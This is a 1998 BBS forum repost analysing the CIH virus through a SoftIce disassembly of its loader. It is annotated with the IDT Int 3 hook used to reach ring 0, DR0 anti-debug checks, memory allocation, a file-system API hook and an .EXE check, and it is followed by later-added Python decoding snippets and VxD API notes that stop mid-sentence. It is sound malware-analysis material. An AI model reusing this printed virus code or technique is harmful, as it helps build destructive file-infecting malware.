softice分析cih的结果.txt
From: TBsoft (TBsoft), Board: Virus

Subject: SoftIce analysis results [repost]

Posted from: 武汉白云黄鹤站 (Mon Oct 26 10:51:47 1998), site-internal mail

From: Nova_Zhao@bbs.ustc.edu.cn (真生命), Board: virus

Subject: SoftIce analysis results

Posted from: 中国科大BBS站 (Sun Oct 25 10:37:13 1998)

Relayed via: wuheebbs!ustcnews!ustcbbs

  

Analysis of CIH

Infected EXE: Sthcd.exe

File length: 209KB

Entry:

CS:EIP=0137:004002A1 SS:ESP=013F:0069FE38 

EAX=004002A0 EBX=00000000 ECX=8159970C EDX=8159974C 

ESI=815996EC EDI=81599A08 EBP=0069FF78 EFL=00000A86 

DS=013F ES=013F FS=37E7 GS=0000 

  

  

  

0137:004002A0 PUSH EBP 

0137:004002A1 LEA EAX,[ESP-08] SS:0069FE30=BFF742F3 

0137:004002A5 XOR EBX,EBX 

0137:004002A7 XCHG EAX,FS:[EBX] ;whose segment is FS??

0137:004002AA CALL 004002AF 

0137:004002AF POP EBX ;EBX = the return address pushed by the CALL above

0137:004002B0 LEA ECX,[EBX+42] 

0137:004002B3 PUSH ECX 

0137:004002B4 PUSH EAX 

0137:004002B5 PUSH EAX   ;these 4 bytes serve as a buffer

0137:004002B6 SIDT FWORD PTR [ESP-02] ;store the interrupt descriptor table register (48-bit IDTR)

  

0137:004002BB POP EBX           ;get the IDT base address

0137:004002BC ADD EBX,1C       ;each descriptor is 8 bytes

0137:004002BF CLI               ;adding 1C points at the Int 3 descriptor

0137:004002C0 MOV EBP,[EBX]          

0137:004002C2 MOV BP,[EBX-04] ;save the Int 3 handler entry in EBP

0137:004002C6 LEA ESI,[ECX+12]       ;load the new Int 3 handler entry into ESI

0137:004002C9 PUSH ESI 

0137:004002CA MOV [EBX-04],SI 

0137:004002CE SHR ESI,10 

0137:004002D1 MOV [EBX+02],SI 

0137:004002D5 POP ESI ;install the new Int 3 handler entry; in this sample ESI=0x00400303

0137:004002D6 INT 3 

0137:004002D7 PUSH ESI ;save ESI

0137:004002D8 MOV ESI,EAX 

0137:004002DA MOV ECX,[EAX-04] 

0137:004002DD REPZ MOVSB ;copy one block of the virus body into the allocated linear memory

0137:004002DF SUB EAX,08 

0137:004002E2 MOV ESI,[EAX] ;done copying?

0137:004002E4 OR ESI,ESI 

0137:004002E6 JZ 004002EA ;jump if done

0137:004002E8 JMP 004002DA ;otherwise loop

;in this sample the virus body is split into four blocks of 0x160, 0xc8,
;0xc9 and 0xfa bytes, 1003 bytes in total

  

0137:004002EA POP ESI ;restore ESI

0137:004002EB INT 3 ;install the file-system monitoring hook, Important!!!!

;restore the Int 3 handler entry

  

0137:004002EC STI 

0137:004002ED XOR EBX,EBX 

0137:004002EF JMP 004002F8 

0137:004002F1 XOR EBX,EBX 

0137:004002F3 MOV EAX,FS:[EBX] 

0137:004002F6 MOV ESP,[EAX] 

0137:004002F8 POP DWORD PTR FS:[EBX] 

0137:004002FB POP EAX 

0137:004002FC POP EBP 

0137:004002FD PUSH 0040A010 ;resume the original program

0137:00400302 RET 

  

  

;new Int 3 handler entry

0137:00400303 JZ 00400337 

0137:00400305 MOV ECX,DR0 ;DR0, debug breakpoint 1: check for a debugger

0137:00400308 JECXZ 0040031A ;jump if none

0137:0040030A ADD DWORD PTR [ESP],15 

0137:0040030E MOV [EBX-04],BP ;restore the Int 3 handler entry

0137:00400312 SHR EBP,10 

0137:00400315 MOV [EBX+02],BP      

0137:00400319 IRETD 

  

0137:0040031A MOV DR0,EBX ;defeat tracing

0137:0040031D PUSH 0F 

0137:0040031F PUSH ECX ;ECX must be zero, for PG_VM

0137:00400320 PUSH FF ;VM Handle 

0137:00400322 PUSH ECX ;Physical address is a multiple of 4K. 

0137:00400323 PUSH ECX ; 

0137:00400324 PUSH ECX 

0137:00400325 PUSH 01 

0137:00400327 PUSH 02 ;PAGEUSEALIGN 

0137:00400329 INT 20 VXDCall _PageAllocate ;allocate a block of linear memory

0137:0040032F ADD ESP,20 

0137:00400332 XCHG EAX,EDI ;base address goes into EDI

0137:00400333 LEA EAX,[ESI-63] ;address of the first virus body block

0137:00400336 IRETD 

  

  

  

0137:00400337 LEA EAX,[EDI-0309] 

0137:0040033D PUSH EAX 

0137:0040033E INT 20 VXDCall IFSMgr_InstallFileSystemApiHook 

;install the file-system monitoring hook, Important!!!!

0137:00400344 MOV DR0,EAX 

0137:00400347 POP EAX 

0137:00400348 MOV ECX,[ESI+3D] 

0137:0040034B MOV EDX,[ECX] 

0137:0040034D MOV [EAX-04],EDX 

0137:00400350 LEA EAX,[EAX-2A] 

0137:00400353 MOV [ECX],EAX 

0137:00400355 CLI 

0137:00400356 JMP 0040030E 

0137:00400358 PUSH EBX 

0137:00400359 CALL 0040035E 

0137:0040035E POP EBX 

0137:0040035F ADD EBX,24 

0137:00400362 PUSH EBX 

0137:00400363 INT 20 VXDCall IFSMgr_RemoveFileSystemApiHook 

0137:00400369 POP EAX 

0137:0040036A PUSH DWORD PTR [ESP+08] 

0137:0040036E CALL [EBX-04] 

0137:00400371 POP ECX 

0137:00400372 PUSH EAX 

0137:00400373 PUSH EBX 

0137:00400374 CALL [EBX-04] 

0137:00400377 POP ECX 

0137:00400378 MOV DR0,EAX 

0137:0040037B POP EAX 

0137:0040037C POP EBX 

0137:0040037D RET 

0137:0040037E CMP AL,0E 

0137:00400381 SHL BYTE PTR [EAX-18],00 

0137:00400385 ADD [EAX],AL 

0137:00400387 ADD [ESI-7F],BL 

0137:0040038A MOV BYTE PTR [EBX],03 

0137:0040038D ADD [EAX],AL 

0137:0040038F TEST BYTE PTR [ESI],01 

0137:00400392 JNZ 00400588 

0137:00400398 LEA EBX,[ESP+28] 

0137:0040039C CMP DWORD PTR [EBX],24 

0137:0040039F JNZ 00400582 

0137:004003A5 INC BYTE PTR [ESI] 

0137:004003A7 ADD ESI,05 

0137:004003AA PUSH ESI 

0137:004003AB MOV AL,[EBX+04] 

0137:004003AE CMP AL,FF 

0137:004003B0 JZ 004003BA 

0137:004003B2 ADD AL,40 

0137:004003B4 MOV AH,3A 

0137:004003B6 MOV [ESI],EAX 

0137:004003B8 INC ESI 

0137:004003B9 INC ESI 

0137:004003BA PUSH 00 

0137:004003BC PUSH 7F 

0137:004003BE MOV EBX,[EBX+10] 

0137:004003C1 MOV EAX,[EBX+0C] 

0137:004003C4 ADD EAX,04 

0137:004003C7 PUSH EAX 

0137:004003C8 PUSH ESI 

0137:004003C9 INT 20 VXDCall UniToBCSPath 

0137:004003CF ADD ESP,10 

0137:004003D2 CMP DWORD PTR [EAX+ESI-04],4558452E 

0137:004003DA POP ESI 

0137:004003DB JNZ 0040057F 

0137:004003E1 CMP WORD PTR [EBX+18],01 

0137:004003E6 JNZ 0040057F 

0137:004003EC MOV AX,4300 

0137:004003F0 INT 20 VXDCall IFSMgr_Ring0_FileIO 

0137:004003F6 JB 0040057F 

0137:004003FC PUSH ECX 

0137:004003FD MOV EDI,[ESI+00000062] 

0137:00400403 ADD [EAX],AL 

0137:00400405 ADD [EAX],AL 

0137:00400407 ADD [EAX],AL 

0137:00400409 ADD [EAX],AL 

0137:0040040B ADD [EAX],AL 

0137:0040040D ADD [EAX],AL 

0137:0040040F ADD [EAX],AL 

0137:00400411 ADD [EAX],AL 

0137:00400413 ADD [EAX],AL 

0137:00400415 ADD [EAX],AL 

0137:00400417 ADD [EAX],AL 

0137:00400419 ADD [EAX],AL 

0137:0040041B ADD [EAX],AL 

0137:0040041D ADD [EAX],AL 

0137:0040041F ADD [EAX],AL 

0137:00400421 ADD [EAX],AL 

0137:00400423 ADD [EAX],AL 

0137:00400425 ADD [EAX],AL 

0137:00400427 ADD [EAX],AL 

0137:00400429 ADD [EAX],AL 

0137:0040042B ADD [EAX],AL 

0137:0040042D ADD [EAX],AL 

0137:0040042F ADD [EAX],AL 

0137:00400431 ADD [EAX],AL 

0137:00400433 ADD [EAX],AL 

0137:00400435 ADD [EAX],AL 

0137:00400437 ADD [EAX],AL 

0137:00400439 ADD [EAX],AL 

0137:0040043B ADD [EAX],AL 

0137:0040043D ADD [EAX],AL 

  

//the above is the first part of the virus body
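An added example (my code, not part of the post) to make the IDT gate arithmetic at 004002B6..004002D5 concrete: it builds a constructed four-entry IDT, replays the two 16-bit writes that hand vector 3 over to 0x00400303, and runs the integrity check a defender would apply to a dumped IDT, flagging any gate whose handler lies below the ring-0 arena (the 0xC0000000 boundary is an assumption).

```python
import struct

GATE_SIZE = 8
RING0_ARENA = 0xC0000000  # assumption: Win9x VxD/ring-0 arena starts here

def make_gate(offset, selector=0x0028, attrs=0x8E):
    """Constructed 32-bit interrupt gate: offset low | selector | 0 | attrs | offset high."""
    return struct.pack("<HHBBH", offset & 0xFFFF, selector, 0, attrs, offset >> 16)

def gate_offset(idt, vector):
    """Reassemble a handler offset as 004002C0/004002C2 do: high word at +6, low word at +0."""
    base = vector * GATE_SIZE
    (lo,) = struct.unpack_from("<H", idt, base)
    (hi,) = struct.unpack_from("<H", idt, base + 6)
    return (hi << 16) | lo

def hook_int3_like_cih(idt, new_handler):
    """Replay the two word writes: EBX = base+1C, [EBX-04] = low word, [EBX+02] = high word."""
    patched = bytearray(idt)
    ebx = 0x1C  # base + 1C, as in ADD EBX,1C
    struct.pack_into("<H", patched, ebx - 4, new_handler & 0xFFFF)   # MOV [EBX-04],SI
    struct.pack_into("<H", patched, ebx + 2, new_handler >> 16)      # MOV [EBX+02],SI
    return bytes(patched)

def suspicious_vectors(idt):
    """Integrity check: vectors whose handler lies below the ring-0 arena."""
    n = len(idt) // GATE_SIZE
    return [v for v in range(n) if gate_offset(idt, v) < RING0_ARENA]

# Constructed 4-entry IDT: every handler sits in the ring-0 arena.
CLEAN_IDT = b"".join(make_gate(0xC0001000 + v * 0x100) for v in range(4))
# ESI value from the listing: the new Int 3 entry at 0x00400303
HOOKED_IDT = hook_int3_like_cih(CLEAN_IDT, 0x00400303)

if __name__ == "__main__":
    print(hex(gate_offset(HOOKED_IDT, 3)), suspicious_vectors(HOOKED_IDT))
```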

  

  

  

Notes:

VxD services

1. _PageAllocate 

C prototype: ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, 

   ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, 

  ULONG flags); 

  

0137:0040031D PUSH 0F 

0137:0040031F PUSH ECX 

0137:00400320 PUSH FF 

0137:00400322 PUSH ECX 

0137:00400323 PUSH ECX 

0137:00400324 PUSH ECX 

0137:00400325 PUSH 01 

0137:00400327 PUSH 02 

  

  

#define PG_VM 0 

#define PG_SYS 1 

#define PG_RESERVED1 2 

#define PG_PRIVATE 3 

#define PG_RESERVED2 4 

#define PG_RELOCK 5 /* PRIVATE to MMGR */ 

#define PG_INSTANCE 6 

#define PG_HOOKED 7 

#define PG_IGNORE 0xFFFFFFFF 

  

#define PAGEZEROINIT 0x00000001 

#define PAGEUSEALIGN 0x00000002 

#define PAGECONTIG 0x00000004 

#define PAGEFIXED 0x00000008 

#define PAGEDEBUGNULFAULT 0x00000010 

#define PAGEZEROREINIT 0x00000020 

#define PAGENOCOPY 0x00000040 

#define PAGELOCKED 0x00000080 

#define PAGELOCKEDIFDP 0x00000100 

#define PAGESETV86PAGEABLE 0x00000200 

#define PAGECLEARV86PAGEABLE 0x00000400 

#define PAGESETV86INTSLOCKED 0x00000800 

#define PAGECLEARV86INTSLOCKED 0x00001000 

#define PAGEMARKPAGEOUT 0x00002000 

#define PAGEPDPSETBASE 0x00004000 

#define PAGEPDPCLEARBASE 0x00008000 

#define PAGEDISCARD 0x00010000 

#define PAGEPDPQUERYDIRTY 0x00020000 

#define PAGEMAPFREEPHYSREG 0x00040000 

#define PAGENOMOVE 0x10000000 

#define PAGEMAPGLOBAL 0x40000000 

#define PAGEMARKDIRTY 0x80000000 
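An added example (my code, not part of the post) that reads the eight PUSHes at 0040031D..00400327 against the prototype above. VMM services declared with a C prototype use the C calling convention: arguments are pushed right to left, so the last push is the first parameter, and the caller pops them afterwards (the ADD ESP,20 after the call is 8 * 4 bytes). Under that rule the call is _PageAllocate(nPages=2, pType=PG_SYS, VM=0, AlignMask=0, minPhys=0, maxPhys=0xFF, PhysAddr=0, flags=0x0F); the flag table below is a subset of the #defines above.

```python
# Prototype parameters, left to right, as given in the notes.
PROTOTYPE = ["nPages", "pType", "VM", "AlignMask",
             "minPhys", "maxPhys", "PhysAddr", "flags"]

PG_TYPES = {0: "PG_VM", 1: "PG_SYS", 2: "PG_RESERVED1", 3: "PG_PRIVATE",
            4: "PG_RESERVED2", 5: "PG_RELOCK", 6: "PG_INSTANCE", 7: "PG_HOOKED"}

PAGE_FLAGS = {0x00000001: "PAGEZEROINIT", 0x00000002: "PAGEUSEALIGN",
              0x00000004: "PAGECONTIG", 0x00000008: "PAGEFIXED",
              0x00000010: "PAGEDEBUGNULFAULT", 0x00000020: "PAGEZEROREINIT",
              0x00000040: "PAGENOCOPY", 0x00000080: "PAGELOCKED",
              0x00000100: "PAGELOCKEDIFDP", 0x10000000: "PAGENOMOVE",
              0x40000000: "PAGEMAPGLOBAL", 0x80000000: "PAGEMARKDIRTY"}

# The eight PUSHes in listing order; ECX holds 0 at that point.
PUSHES = [0x0F, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x01, 0x02]

def decode_page_allocate(pushes):
    """C convention: the last value pushed is the first parameter."""
    if len(pushes) != len(PROTOTYPE):
        raise ValueError("expected %d pushes, got %d" % (len(PROTOTYPE), len(pushes)))
    return dict(zip(PROTOTYPE, reversed(pushes)))

def decode_flags(value):
    """Expand a flags word into the PAGE* names that are set, lowest bit first."""
    return [name for bit, name in sorted(PAGE_FLAGS.items()) if value & bit]

def describe(pushes):
    """Human-readable view of the call, plus the bytes the caller must pop."""
    args = decode_page_allocate(pushes)
    return {"nPages": args["nPages"],
            "pType": PG_TYPES.get(args["pType"], "unknown"),
            "maxPhys": args["maxPhys"],
            "flags": decode_flags(args["flags"]),
            "stack_cleanup": len(pushes) * 4}  # 0x20, matching ADD ESP,20

if __name__ == "__main__":
    print(describe(PUSHES))
```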

  

  

2.IFSMgr_InstallFileSystemApiHook 

IFSMgr_InstallFileSystemApiHook( 

pIFSFileHookFunc HookFunc 

) 

3.IFSMgr_RemoveFileSystemApiHook 

IFSMgr_RemoveFileSystemApiHook( 

pIFSFileHookFunc HookFunc 

) 

4.UniToBCSPath 

UniToBCSPath( 

unsigned char * pBCSPath, 

ParsedPath * pUniPath, 

unsigned int maxLength, 

int charSet 

) 

This service converts a canonicalized unicode pathname to a normal pathname in the specified BCS character set i.e. the path element lengths are converted into proper path separators in addition to the character set conversion. Currently, the Windows ANSI codepage or the current OEM codepage in the system can be specified for the conversion. It is important to note that the source and destination buffers cannot be the same nor can they overlap. They should be two separate buffers. This service does not terminate the converted path with a NUL character, the caller of the service needs to do this, if necessary.

  

5.IFSMgr_Ring0_FileIO 

This service provides a register-based VxD callable interface to the common filesystem functions. Other VxDs in the system can use this service to make filesystem calls without having to issue int 21h calls. An FSD itself can call this interface to do filesystem operations in certain situations. The different functions provided as part of this service are described below. Since these calls can be made only by 'trusted' system components, the IFS manager does not do any parameter validation on them. Users of this service should be very careful to check that they are passing in valid parameters.

  

OpenCreateFile 

This interface is the same as the interface for the int 21h extended open function (06Ch). If the R0_OPENCREATFILE function code is used, the operation is done in an independent context, so that handle is globally accessible from any VM. If the R0_OPENCREAT_IN_CONTEXT function code is used, the operation is done in the context of the current thread and process. 

[EAX] R0_OPENCREATFILE or R0_OPENCREAT_IN_CONTEXT 

[BX] Open mode and other flags. The flags are exactly the same as those on the int 21h function 6Ch. Please refer to the specification of the int 21h function for details. 

[CX] Attributes to use on a create operation. 

[DL] Action to be performed. Look at the int 21h, function 6ch documentation for details. 

[DH] Special flags that are available only on this api. This register is reserved and not used on the int 21h, function 6Ch api. 

Special Ring 0 Api Open Flags: 

Value Meaning 

R0_NO_CACHE Indicates that reads and writes on the file should not be cached. All operations will be directly done to the disk. 

R0_SWAPPER_CALL Indicates that the i/o operation is being performed to the system swap file. This is a privileged call that should be set only by the memory manager when it is doing i/o to page stuff in and out of the disk. The filesystem that handles swap file io needs to ensure certain conditions to prevent deadlocks. These are described in section 8.3.4 of this document. 

[ESI] Flat pointer to the pathname of the file to be opened/created. 

Carry flag clear, operation was successful. 

[EAX] Handle to opened file. 

[ECX] Actual action performed. For the return values, please refer to the document describing the int 21h, function 6Ch api. 

Carry flag set, an error occurred. [AX] contains the errorcode. 

Registers Used EAX, ECX, Flags. 

  

ReadFile 

This function is called to read a file previously opened by OpenCreateFile. The handle must be one returned from the OpenCreateFile service described above, it cannot be a handle opened by issuing an int 21h. If the R0_READFILE_IN_CONTEXT function code i 

[EAX] R0_READFILE or R0_READFILE_IN_CONTEXT. 

[EBX] File handle. 

[ECX] Count of bytes to be read. This can be a full 32-bit transfer count. 

[EDX] Position in file the read operation needs to start at. 

[ESI] Flat pointer to the buffer the data is to read into. 

Carry flag clear, no error. 

[ECX] Number of bytes actually read. 

Carry flag set, an error occurred. [AX] contains the errorcode. 
